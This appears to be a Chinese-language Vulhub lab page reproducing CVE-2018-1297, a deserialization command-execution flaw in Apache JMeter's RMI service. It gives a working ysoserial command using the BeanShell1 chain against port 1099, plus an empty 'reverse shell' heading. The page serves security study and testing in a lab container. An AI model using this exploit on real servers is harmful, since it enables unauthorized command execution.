Jmeter RMI 反序列化命令執行漏洞(CVE-2018-1297)
Path jmeter/CVE-2018-1297
Apache JMeter是美國阿帕奇(Apache)軟件基金會的一套使用Java語言編寫的用于壓力測試和性能測試的開源軟件。其2.x版本和3.x版本中存在反序列化漏洞,攻擊者可以利用該漏洞在目標服務器上執行任意命令。
漏洞環境
運行漏洞環境:
docker-compose up -d
運行完成后,將啟動一個RMI服務并監聽1099端口。
漏洞復現
直接使用ysoserial即可進行利用:
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 BeanShell1 'touch /tmp/success'
我們使用的是BeanShell1這條利用鏈。使用docker-compose exec jmeter bash進入容器,可見/tmp/success已成功創建:

反彈shell:

Vulhub 文檔
推薦文章: